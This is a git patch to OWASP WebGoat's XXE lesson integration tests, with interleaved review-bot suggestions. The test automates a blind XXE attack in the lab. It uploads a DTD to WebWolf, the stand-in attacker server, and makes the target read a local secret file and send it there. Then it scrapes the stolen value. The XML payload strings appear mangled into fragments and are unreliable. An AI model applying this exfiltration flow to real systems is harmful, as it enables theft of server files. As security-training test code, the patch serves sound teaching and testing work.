From 30d38f9b56b27b707910733ec8f6f8a156a03b95 Mon Sep 17 00:00:00 2001 From: Rene Zubcevic Date: Wed, 18 Sep 2019 16:10:52 +0200 Subject: [PATCH] completed test --- .../org/owasp/webgoat/IntegrationTest.java | 20 +++++- .../test/java/org/owasp/webgoat/XXETest.java | 62 +++++++++++-------- .../resources/application-inttest.properties | 8 ++- 3 files changed, 60 insertions(+), 30 deletions(-) diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java index d896b1c80..4089e3b77 100644 --- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java @@ -3,6 +3,7 @@ package org.owasp.webgoat; import io.restassured.RestAssured; import io.restassured.config.RestAssuredConfig; import io.restassured.config.SSLConfig; +import io.restassured.http.ContentType; import lombok.Getter; import org.hamcrest.CoreMatchers; import org.junit.After; @@ -210,7 +211,8 @@ public abstract class IntegrationTest { .config(restConfig) .cookie("JSESSIONID", getWebGoatCookie()) .get(url("service/lessonoverview.mvc")) - .then() + .then() + .log().all() .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true))); Assert.assertThat(RestAssured.given() @@ -222,4 +224,20 @@ public abstract class IntegrationTest { .statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix))); } + + public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) { + Assert.assertThat( + RestAssured.given() + .when() + .config(restConfig) + .contentType(contentType) + .cookie("JSESSIONID", getWebGoatCookie()) + .body(body) + .post(url) + .then() + .statusCode(200) + .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); + } + } + 
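Review bot: The `.log().all()` inserted after `.then()` in the second hunk prints the complete lesson-overview response (headers and body) on every call of the enclosing method, even when the `solved` assertion passes, so every integration test that calls it fills the build log with JSON. REST-assured's `.log().ifValidationFails()` emits the same detail only when the status code or matcher check fails, which is when anyone reads it; suggest replacing the added line with `.log().ifValidationFails()`. The enclosing method (apparently `checkResults`, given the `prefix` matcher below it) starts before the hunk.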
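Review bot: `checkAssignment` in the third hunk becomes a public helper on the abstract base class that every lesson test will call, but it has no Javadoc, and its `expectedResult` parameter is a bare boolean whose meaning (the `lessonCompleted` field of the response) is only visible by reading the body. Suggest a Javadoc such as `/** Posts {@code body} to {@code url} with the given content type as the logged-in WebGoat user and asserts that the response has status 200 and a {@code lessonCompleted} field equal to {@code expectedResult}. */` with matching `@param` lines. The hunk also appears to end with an added line consisting only of whitespace after the class's closing brace (`+ ` at the very end), which is worth dropping before merge.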
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java index ab6e3350c..86f2eb56c 100644 --- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java @@ -5,8 +5,6 @@ import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; -import org.hamcrest.CoreMatchers; -import org.junit.Assert; import org.junit.Test; import io.restassured.RestAssured; @@ -16,7 +14,7 @@ public class XXETest extends IntegrationTest { private static final String xxe3 = "]>&xxe;test"; private static final String xxe4 = "]>&xxe;test"; - private static final String dtd7 = "\">%all;"; + private static final String dtd7 = "\">%all;"; private static final String xxe7 = "%remote;]>test&send;"; private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat"); 
@@ -28,15 +26,33 @@ public class XXETest extends IntegrationTest { startLesson("XXE"); checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true); + checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true); - Path webWolfFilePath = Paths.get(webwolfFileDir); + + + + checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,""+getSecret()+"",true ); + + checkResults("xxe/"); + + } + + /** + * This performs the steps of the exercise before the secret can be committed in the final step. + * @return + * @throws IOException + */ + private String getSecret() throws IOException { + + //remove any left over DTD + Path webWolfFilePath = Paths.get(webwolfFileDir); if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) { - System.out.println("delete file"); Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd"))); } String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt"); - String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile); - System.out.println(dtd7String); + String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile); + + //upload DTD RestAssured.given() .when() .config(restConfig) 
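Review bot: The new `getSecret()` Javadoc leaves `@return` empty and the summary sentence does not say what is returned; suggest `@return the secret string scraped from the WebWolf requests page (presumably the value that the blind XXE out-of-band request delivered — confirm), which the caller submits as the final answer`. The leftover-DTD cleanup right below it builds the same path twice and checks `exists()` before `Files.delete`; `Files.deleteIfExists(Paths.get(webwolfFileDir).resolve(Paths.get(getWebgoatUser(), "blind.dtd")));` does the same in one call without the check-then-delete step. The test method in which this hunk starts begins outside the hunk, and `getSecret()` continues into the next hunk.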
@@ -46,28 +62,20 @@ public class XXETest extends IntegrationTest { .then() .extract().response().getBody().asString(); - - String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser()); - System.out.println(xxe7String); + //upload attack + String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser()); checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false ); - //checkResults("/XXE/"); - - } - - public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) { - Assert.assertThat( - RestAssured.given() - .when() - .config(restConfig) - .contentType(contentType) - .cookie("JSESSIONID", getWebGoatCookie()) - .body(body) - .post(url) - .then() - .log().all() - .statusCode(200) - .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); + //read results from WebWolf + String result = RestAssured.given() + .when() + .config(restConfig) + .cookie("WEBWOLFSESSION", getWebWolfCookie()) + .get(webWolfUrl("/WebWolf/requests")) + .then() + .extract().response().getBody().asString(); + result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33); + return result; } } diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties index 9c388c7ca..4286e914f 100644 --- a/webgoat-integration-tests/src/test/resources/application-inttest.properties +++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties 
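Review bot: The last lines of `getSecret()`, `result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33)`, throw a bare `StringIndexOutOfBoundsException` when the marker is absent from the WebWolf requests page (`lastIndexOf` returns -1), which hides the real failure — the out-of-band request never arrived or the page format changed. Looking the marker up once and failing with a message makes the test diagnosable, and the magic `33` (apparently marker length plus the length of the secret — confirm against the lesson) deserves a named constant. `AssertionError` is used below because this commit removes the `org.junit.Assert` import from the file. `getSecret()` starts in the previous hunk.
```java
        //read results from WebWolf
        String result = RestAssured.given()
                // … unchanged: request to webWolfUrl("/WebWolf/requests") …
                .extract().response().getBody().asString();
        String marker = "WebGoat 8.0 rocks... (";
        int start = result.lastIndexOf(marker);
        if (start < 0) {
            throw new AssertionError("marker '" + marker + "' not found in WebWolf requests page");
        }
        return result.substring(start, start + SECRET_ENTRY_LENGTH); // SECRET_ENTRY_LENGTH = 33, the old literal
```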
@@ -1,6 +1,10 @@ +#In order to run tests a known temp directory is preferred +#that is why these values are used + webgoat.user.directory=${user.dir}/target/.webgoat webgoat.server.directory=${user.dir}/target/.webgoat - webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver -spring.jpa.hibernate.ddl-auto=create-drop \ No newline at end of file +#database will get deleted for every mvn clean install +#as these extra properties are read by WebGoat and WebWolf the drop of the tables +#was not helpful. \ No newline at end of file
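Review bot: The new trailing comment explains why `spring.jpa.hibernate.ddl-auto=create-drop` was removed but not what it means for test authors: the database now persists across test runs until `mvn clean` is executed, so every test must tolerate data left behind by an earlier run (the `blind.dtd` cleanup added to `XXETest.getSecret()` in this same commit is an instance of that). Suggest adding a line such as `#consequence: tests must cope with state left by a previous run; use mvn clean to reset`. The file also still ends without a trailing newline, as the `\ No newline at end of file` marker shows on both sides.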